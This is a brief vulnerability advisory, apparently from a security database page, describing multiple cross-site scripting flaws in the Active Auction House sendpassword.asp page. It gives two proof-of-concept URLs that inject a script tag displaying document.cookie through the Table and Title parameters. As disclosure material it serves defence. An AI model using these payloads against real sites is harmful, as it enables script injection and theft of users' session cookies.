|
Active Auction House Sendpassword.ASP Multiple Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept URI's are available: http://www.example.com/activeauctionsuperstore/sendpassword.asp?Table=Accounts&Title="><script>alert(document.cookie)</script> http://www.example.com/activeauctionsuperstore/sendpassword.asp?Table="><script>alert(document.cookie)</script>&Title=Account |
|
|
Privacy Statement |